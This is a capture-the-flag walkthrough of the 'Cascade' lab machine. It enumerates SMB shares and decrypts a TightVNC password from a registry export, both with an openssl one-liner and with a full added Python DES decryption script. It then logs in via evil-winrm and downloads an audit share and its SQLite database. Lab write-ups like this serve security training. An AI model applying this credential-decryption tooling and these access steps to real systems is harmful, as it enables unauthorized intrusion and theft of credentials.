➜ cascade find .
.
./Contractors
find: ‘./Contractors’: Permission denied
./Finance
find: ‘./Finance’: Permission denied
./IT
./IT/Email Archives
./IT/Email Archives/Meeting_Notes_June_2018.html
./IT/LogonAudit
./IT/Logs
./IT/Logs/Ark AD Recycle Bin
./IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
./IT/Logs/DCs
./IT/Logs/DCs/dcdiag.log
./IT/Temp
./IT/Temp/r.thompson
./IT/Temp/s.smith
./IT/Temp/s.smith/VNC Install.reg
./Production
find: ‘./Production’: Permission denied
./Temps
find: ‘./Temps’: Permission denied
The .html file
Found a password in 'VNC Install.reg', sitting in s.smith's folder under the world-readable IT\Temp directory:
➜ s.smith cat VNC\ Install.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
These passwords are not hashed, only DES-encrypted with a fixed key that every VNC implementation ships with, so the value is reversible by anyone who can read it. I googled how to decrypt it and found this GitHub page: https://github.com/frizb/PasswordDecrypts
➜ s.smith echo -n '6bcf2a4b6e5aca0f' | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000 73 54 33 33 33 76 65 32 |sT333ve2|
00000008
sT333ve2
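The decryption above, as an added worked example that is not part of this write-up or of the PasswordDecrypts repo: a standard-library-only Python script that pulls the "Password"=hex: value out of a TightVNC .reg export and DES-decrypts it. The fixed key is a documented VNC constant (23,82,107,6,35,78,88,7 in the VNC source; VNC's d3des reads key bytes bit-reversed, which is why in standard-DES form it is e84ad660c4721ae0, the value the openssl one-liner uses). The DES tables are from FIPS 46-3, the sample .reg text is trimmed from the listing above, and the function names are mine.

```python
"""Decrypt a TightVNC "Password" registry value (added example, not from the write-up).

VNC does not hash the password: it DES-encrypts it with a key hardcoded in every
VNC implementation (23,82,107,6,35,78,88,7).  d3des, the DES used by VNC, reads
key bytes with the bits reversed, so in standard-DES form that key is
e84ad660c4721ae0.  DES is implemented from the FIPS 46-3 tables so that the
script needs only the standard library.
"""
import re

# DES tables (FIPS 46-3). Positions are 1-indexed from the most significant bit.
IP = [b - 8 * j for b in (58, 60, 62, 64, 57, 59, 61, 63) for j in range(8)]
FP = [0] * 64
for _i, _p in enumerate(IP):
    FP[_p - 1] = _i + 1                      # final permutation = inverse of IP
E = [((4 * i + k - 1) % 32) + 1 for i in range(8) for k in range(6)]
P = [16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10,
     2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25]
PC1 = ([b - 8 * j for b in (57, 58, 59) for j in range(8)] + [60 - 8 * j for j in range(4)]
       + [b - 8 * j for b in (63, 62, 61) for j in range(8)] + [28 - 8 * j for j in range(4)])
PC2 = [14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23, 19, 12, 4,
       26, 8, 16, 7, 27, 20, 13, 2, 41, 52, 31, 37, 47, 55, 30, 40,
       51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32]
SHIFTS = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
SBOX = [  # each S-box as 64 hex digits: four rows of sixteen entries
    "e4d12fb83a6c59070f74e2d1a6cb953841e8d62bfc973a50fc8249175b3ea06d",
    "f18e6b34972dc05a3d47f28ec01a69b50e7ba4d158c6932fd8a13f42b67c05e9",
    "a09e63f51dc7b428d709346a285ecbf1d6498f30b12c5ae71ad069874fe3b52c",
    "7de3069a1285bc4fd8b56f03472c1ae9a690cb7df13e52843f06a1d8945bc72e",
    "2c417ab6853fd0e9eb2c47d150fa3986421bad78f9c5630eb8c71e2d6f09a453",
    "c1af92680d34e75baf427c9561de0b389ef528c3704a1db6432c95fabe17608d",
    "4b2ef08d3c975a61d0b7491ae35c2f8614bdc37eaf6805926bd814a7950fe23c",
    "d2846fb1a93e50c71fd8a374c56b0e927b419ce206adf35821e74a8dfc90356b",
]
VNC_FIXED_KEY = bytes.fromhex("e84ad660c4721ae0")   # VNC's fixed key, standard-DES bit order


def _permute(block, table, width):
    """Build a new integer by picking bits of `block` (width bits) in `table` order."""
    out = 0
    for pos in table:
        out = (out << 1) | ((block >> (width - pos)) & 1)
    return out


def _subkeys(key):
    """The 16 round keys (48 bits each) derived from an 8-byte key."""
    k = _permute(int.from_bytes(key, "big"), PC1, 64)
    c, d = k >> 28, k & 0xFFFFFFF
    keys = []
    for s in SHIFTS:
        c = ((c << s) | (c >> (28 - s))) & 0xFFFFFFF
        d = ((d << s) | (d >> (28 - s))) & 0xFFFFFFF
        keys.append(_permute((c << 28) | d, PC2, 56))
    return keys


def _feistel(r, k):
    x = _permute(r, E, 32) ^ k                # expand 32 -> 48 bits, mix in round key
    out = 0
    for i in range(8):
        six = (x >> (42 - 6 * i)) & 0x3F
        row, col = ((six >> 5) << 1) | (six & 1), (six >> 1) & 0xF
        out = (out << 4) | int(SBOX[i][16 * row + col], 16)
    return _permute(out, P, 32)


def _des_block(block, keys):
    x = _permute(int.from_bytes(block, "big"), IP, 64)
    l, r = x >> 32, x & 0xFFFFFFFF
    for k in keys:
        l, r = r, l ^ _feistel(r, k)
    return _permute((r << 32) | l, FP, 64).to_bytes(8, "big")


def des_cbc_decrypt(data, key, iv=bytes(8)):
    """DES-CBC without padding, i.e. what `openssl enc -des-cbc -nopad -K ... -iv 0...` does."""
    if len(data) % 8:
        raise ValueError("ciphertext must be a multiple of 8 bytes")
    keys = _subkeys(key)[::-1]                # decryption = rounds with keys reversed
    out, prev = bytearray(), iv
    for i in range(0, len(data), 8):
        block = data[i:i + 8]
        out += bytes(a ^ b for a, b in zip(_des_block(block, keys), prev))
        prev = block
    return bytes(out)


def vnc_password_from_reg(reg_text):
    """Pull the "Password"=hex:... value out of a .reg export and decrypt it."""
    m = re.search(r'"Password"=hex:([0-9a-fA-F,\\\s]+)', reg_text)
    if not m:
        raise ValueError('no "Password"=hex: value found')
    enc = bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", m.group(1)))  # also drops ",\" line wraps
    # VNC keeps at most 8 characters and NUL-pads shorter passwords.
    return des_cbc_decrypt(enc, VNC_FIXED_KEY).rstrip(b"\x00").decode("latin-1")


# Constructed sample: a trimmed copy of the VNC Install.reg shown on this page.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"RfbPort"=dword:0000170c
"UseVncAuthentication"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
'''

if __name__ == "__main__":
    print(vnc_password_from_reg(SAMPLE_REG))   # sT333ve2
```

If you would rather keep using the openssl one-liner, note that on OpenSSL 3.x single DES lives in the legacy provider, so the same command needs `-provider legacy -provider default` added or `enc` will report the cipher as unsupported.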
With the username s.smith and password sT333ve2 I'll try to log in.
Got a shell with evil-winrm:
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith
User name                    s.smith
Full Name                    Steve Smith
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/28/2020 7:58:05 PM
Password expires             Never
Password changeable          1/28/2020 7:58:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 MapAuditDrive.vbs
User profile
Home directory
Last logon                   1/28/2020 11:26:39 PM

Logon hours allowed          All

Local Group Memberships      *Audit Share          *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
s.smith is a member of the Audit Share group, so I have access to the Audit$ share:
➜ www smbclient //10.10.10.182/Audit$ -U "s.smith@cascade.local%sT333ve2"
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 23:31:26 2020
  ..                                  D        0  Wed Jan 29 23:31:26 2020
  CascAudit.exe                      An    13312  Wed Jan 29 03:16:51 2020
  CascCrypto.dll                     An    12288  Wed Jan 29 23:30:20 2020
  DB                                  D        0  Wed Jan 29 03:10:59 2020
  RunAudit.bat                        A       45  Wed Jan 29 04:59:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 12:08:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 12:08:38 2019
  x64                                 D        0  Mon Jan 27 03:55:27 2020
  x86                                 D        0  Mon Jan 27 03:55:27 2020

                6553343 blocks of size 4096. 1615281 blocks available
smb: \>
I saw there was a DB directory, so I downloaded the .db file inside it:
smb: \> cd DB\
smb: \DB\> dir
  .                                   D        0  Wed Jan 29 03:10:59 2020
  ..                                  D        0  Wed Jan 29 03:10:59 2020
  Audit.db                           An    24576  Wed Jan 29 03:09:24 2020

                6553343 blocks of size 4096. 1615281 blocks available
smb: \DB\> mget Audit.db
Get file Audit.db? y
getting file \DB\Audit.db of size 24576 as Audit.db (15.6 KiloBytes/sec) (average 15.6 KiloBytes/sec)
Viewing the .db file with sqlite3:
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite>
sqlite> select * from DeletedUserAudit
...> ;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
Nothing of interest in there (just records of deleted AD users, including a TempAdmin). I'll download all the files from the Audit$ share instead.
➜ www smbclient //10.10.10.182/Audit$ -U "s.smith@cascade.local%sT333ve2"
Try "help" to get a list of possible commands.
smb: \> prompt off
smb: \> recurse ON
smb: \> mget *
getting file \CascAudit.exe of size 13312 as CascAudit.exe (10.6 KiloBytes/sec) (average 42.8 KiloBytes/sec)
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (9.8 KiloBytes/sec) (average 40.0 KiloBytes/sec)
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.0 KiloBytes/sec) (average 37.2 KiloBytes/sec)
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (84.6 KiloBytes/sec) (average 47.1 KiloBytes/sec)
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (70.9 KiloBytes/sec) (average 49.8 KiloBytes/sec)
getting file \DB\Audit.db of size 24576 as DB/Audit.db (19.7 KiloBytes/sec) (average 48.3 KiloBytes/sec)
getting file \x64\SQLite.Interop.dll of size 1639936 as x64/SQLite.Interop.dll (123.6 KiloBytes/sec) (average 74.8 KiloBytes/sec)
getting file \x86\SQLite.Interop.dll of size 1246720 as x86/SQLite.Interop.dll (110.1 KiloBytes/sec) (average 83.0 KiloBytes/sec)